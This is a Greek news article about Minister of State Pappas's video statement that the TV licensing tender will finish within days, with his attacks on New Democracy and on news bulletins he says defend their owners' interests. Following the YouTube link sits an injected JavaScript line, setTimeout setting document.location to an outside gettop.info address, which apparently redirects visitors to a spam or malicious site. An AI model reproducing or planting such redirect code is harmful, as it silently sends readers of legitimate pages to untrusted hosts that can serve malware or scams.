Παππάς: Πραγματικότητα σε λίγες ημέρες το νέο τηλεοπτικό τοπίο (ΒΙΝΤΕΟ)

0
4

Δηλώσεις σχετικά με την αδειοδότηση των τηλεοπτικών σταθμών έκανε ο υπουργός Επικρατείας τονίζοντας σε βιντεοσκοπημένο μήνυμά του ότι ο διαγωνισμός θα ολοκληρωθεί εντός των επόμενων ημερών.

Επιτίθεται στη Νέα Δημοκρατία τονίζοντας πως  «δυστυχώς, επέλεξε να διασυρθεί και να συρθεί πίσω από καθόλου έννομα συμφέροντα όσων νόμιζαν ότι η αεροπειρατεία των συχνοτήτων θα συνεχίζονταν για πάντα» συμπληρώνοντας: «Είναι επίσης ντροπή, είναι αίσχος», συνέχισε ο υπουργός Επικρατείας, «για όσους ανεπιτυχώς επιχείρησαν να τρομοκρατήσουν δημόσιους λειτουργούς για να διαφυλάξουν τα ειδικά και ιδιαίτερα συμφέροντά τους».

Ο κ. Παππάς ανέφερε αναλυτικά πού διοχετεύθηκαν τα χρήματα από τις πρώτες δόσεις για τις τηλεοπτικές άδειες ενώ επεσήμανε: «Οι πολίτες πλέον γνωρίζουν πως κάποια δελτία ειδήσεων δεν είναι για την ενημέρωσή τους. Είναι δελτία για την υπεράσπιση των συμφερόντων των συγκεκριμένων ιδιοκτησιών» και συνέχισε: «Η λάσπη όμως, επιστρέφει πάρα πολύ γρήγορα, πίσω σε αυτούς που την εκτοξεύουν», πρόσθεσε.

«Μια μεγάλη τομή, μια μεγάλη μεταρρύθμιση ολοκληρώνεται, ας το καταλάβουν, πρόσθεσε ο υπουργός Επικρατείας, υπογραμμίζοντας ότι «κανείς δεν είναι υπεράνω του νόμου, το νέο τηλεοπτικό τοπίο σε λίγες ημέρες θα είναι πραγματικότητα».

https://youtu.be/z4-RNg2zv_E setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here